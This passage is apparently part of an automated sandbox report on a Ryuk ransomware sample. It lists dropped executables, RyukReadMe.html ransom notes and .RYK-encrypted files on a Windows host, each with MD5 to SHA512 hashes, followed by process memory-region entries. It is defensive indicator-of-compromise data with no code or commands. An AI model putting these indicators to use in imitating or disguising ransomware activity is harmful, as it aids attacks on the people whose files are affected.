            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat.RYK

            MD5

            42d3e851a2757ddba5a1f4a487bfb3f6

            SHA1

            90368ba6601e162749c118a8ec3ccc75d6d3c79f

            SHA256

            274270cdeae4f36dd496b2a45936c482f5bc3dc12c1f0110feeab741c798c836

            SHA512

            6ab13bfb891aa637f8f2bdf3460a0fa95a67d3cc17aac993e94c4e0fa74a542608b71155e9606d29a2e95e81df560d0008a5f3c42e25f484141fae330281693e

          • C:\Users\Admin\AppData\Local\Adobe\Acrobat\DC\RyukReadMe.html

            MD5

            d066a6975e064e7e09435b9c3d684286

            SHA1

            dec75d8906873db0f5c360652513901a528f0af1

            SHA256

            f95ab8264a2d754ab109acc0942918195ba193c6902ea25d17466ac455553c90

            SHA512

            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • C:\Users\Admin\AppData\Local\Temp\RyukReadMe.html

            MD5

            d066a6975e064e7e09435b9c3d684286

            SHA1

            dec75d8906873db0f5c360652513901a528f0af1

            SHA256

            f95ab8264a2d754ab109acc0942918195ba193c6902ea25d17466ac455553c90

            SHA512

            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\ScKDbDhotlan.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\gWqMBNtPvlan.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\Admin\AppData\Local\Temp\wtLIEtzKGrep.exe

            MD5

            3c08d1e5233c623bfc854879173544de

            SHA1

            a1add1d1e80d84440fc013abcc754f1bdddf3a20

            SHA256

            956246824d2fb2f5f4738c450e8d222042b08c3e5c67c3ec755bedf641b7b1c5

            SHA512

            01adb468d0318f44532f5222fff6f06eb5128b6b368d2a939b0e5c54da592784e793f97a1a9617f908cf0b2b61c61253ec0157433faf3894cc34e63fbbc5a943

          • C:\Users\RyukReadMe.html

            MD5

            d066a6975e064e7e09435b9c3d684286

            SHA1

            dec75d8906873db0f5c360652513901a528f0af1

            SHA256

            f95ab8264a2d754ab109acc0942918195ba193c6902ea25d17466ac455553c90

            SHA512

            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • C:\odt\RyukReadMe.html

            MD5

            d066a6975e064e7e09435b9c3d684286

            SHA1

            dec75d8906873db0f5c360652513901a528f0af1

            SHA256

            f95ab8264a2d754ab109acc0942918195ba193c6902ea25d17466ac455553c90

            SHA512

            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • C:\odt\config.xml.RYK

            MD5

            1d23bf77cb8a6d3e549b4028de617146

            SHA1

            04e86151ae149e6195c8ad8aaa55947cd124f4f5

            SHA256

            efc03116dcc8ba970523e902c67d4585672e5053b61d24c18fbd53e1fc3f97c0

            SHA512

            91e29a8eea5ff41d76f0c280c3e6c5eaa6df10cdbf73fd358d678c711c626bab6610bd05007813ff99dd7c6e3bd20d1df88ed30d7ac256a7e9497088ac088112

          • C:\users\Public\RyukReadMe.html

            MD5

            d066a6975e064e7e09435b9c3d684286

            SHA1

            dec75d8906873db0f5c360652513901a528f0af1

            SHA256

            f95ab8264a2d754ab109acc0942918195ba193c6902ea25d17466ac455553c90

            SHA512

            88e19dc659ed673d5df44f02643dfd14882eeb5af59e50c8e7fdfa0a42b09cec3ec9daafb1ab23f56d4c88b3194e3f602248bfd74aac3b85d518aca4838e8912

          • memory/644-24-0x0000000002F50000-0x0000000002F51000-memory.dmp

            Filesize

            4KB

          • memory/644-25-0x0000000003750000-0x0000000003751000-memory.dmp

            Filesize

            4KB

          • memory/644-2-0x0000000002340000-0x0000000002341000-memory.dmp

            Filesize

            4KB

          • memory/644-4-0x0000000035000000-0x000000003502A000-memory.dmp

            Filesize

            168KB

          • memory/644-3-0x00000000004E0000-0x0000000000500000-memory.dmp

            Filesize

            128KB

          • memory/652-11-0x0000000000000000-mapping.dmp

          • memory/652-14-0x00000000020D0000-0x00000000020D1000-memory.dmp

            Filesize

            4KB

          • memory/1448-99-0x0000000000000000-mapping.dmp

          • memory/1764-105-0x0000000000000000-mapping.dmp

          • memory/1768-102-0x0000000000000000-mapping.dmp

          • memory/2000-5-0x0000000000000000-mapping.dmp

          • memory/2000-8-0x00000000021D0000-0x00000000021D1000-memory.dmp

            Filesize

            4KB

          • memory/2156-100-0x0000000000000000-mapping.dmp

          • memory/2608-17-0x0000000000000000-mapping.dmp

          • memory/2608-20-0x00000000021A0000-0x00000000021A1000-memory.dmp

            Filesize

            4KB

          • memory/4432-89-0x0000000000000000-mapping.dmp

          • memory/4444-27-0x0000000000000000-mapping.dmp

          • memory/4456-28-0x0000000000000000-mapping.dmp

          • memory/4484-85-0x0000000000000000-mapping.dmp

          • memory/4524-104-0x0000000000000000-mapping.dmp

          • memory/4656-88-0x0000000000000000-mapping.dmp

          • memory/4668-91-0x0000000000000000-mapping.dmp

          • memory/4732-90-0x0000000000000000-mapping.dmp

          • memory/4748-87-0x0000000000000000-mapping.dmp

          • memory/4792-86-0x0000000000000000-mapping.dmp

          • memory/4796-80-0x0000000000000000-mapping.dmp

          • memory/4844-82-0x0000000000000000-mapping.dmp

          • memory/4852-79-0x0000000000000000-mapping.dmp

          • memory/4864-103-0x0000000000000000-mapping.dmp

          • memory/4884-81-0x0000000000000000-mapping.dmp

          • memory/4944-83-0x0000000000000000-mapping.dmp

          • memory/5056-84-0x0000000000000000-mapping.dmp

          • memory/5088-101-0x0000000000000000-mapping.dmp